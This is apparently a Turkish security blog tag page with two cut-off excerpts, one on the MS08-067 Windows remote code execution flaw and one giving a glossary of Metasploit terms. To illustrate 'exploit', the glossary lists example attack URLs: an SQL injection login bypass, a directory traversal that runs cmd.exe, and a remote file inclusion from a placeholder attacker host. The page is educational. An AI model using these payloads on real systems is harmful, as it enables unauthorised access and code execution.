Tagged: metasploitle hack

MS Windows Server Service Code Execution (MS08-067)

23 Ekim 2008 Perşembe günü Microsoft bir yama yayınladı.Bu yamanın kapattığı açıklık bütün Windows türlerini tehdit etdiyor. Özellikle de Windows 2000/SP4, Windows XP/SP2/SP3 ve Windows 2003/SP1/SP2 işletim sistemlerinde uzaktan kod çalıştırılmasına izin vermekte , Windows Vista ve Windows 2008 Server işletim sistemlerinde ise servis dışı bırakma saldırılarına olanak sağlamaktadır. Microsoft Güvenlik Bülteni: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx Exploit Kodları: http://www.milw0rm.com/exploits/7104 Örnek Bir Saldırı ; Tam...

Metasploit ile Güvenlik Denetimi

Metasploit ile Güvenlik Denetimi Terimler: Exploit : Bir sistemin yada programin güvenlik açigini kullanarak yetkisiz bir islem yapilmasini saglayan yöntem. http://sunucu/script/login.asp?uid=’ OR 1=1– http://sunucu/script/..%c0%af../winnt/system32/cmd.exe?/c+dir http://sunucu/script/index.php?dizin=http://saldırgan.com/kotukod.txt? Payload : Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik. Shellcode:Exploit sonrasi çalisicak olan sisteme özel kodlar. Nop : “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler.. Encoder : Çalışacak olan Shellcode’u değiştiren ve...

CEH Türkiye Hosting Sponsoru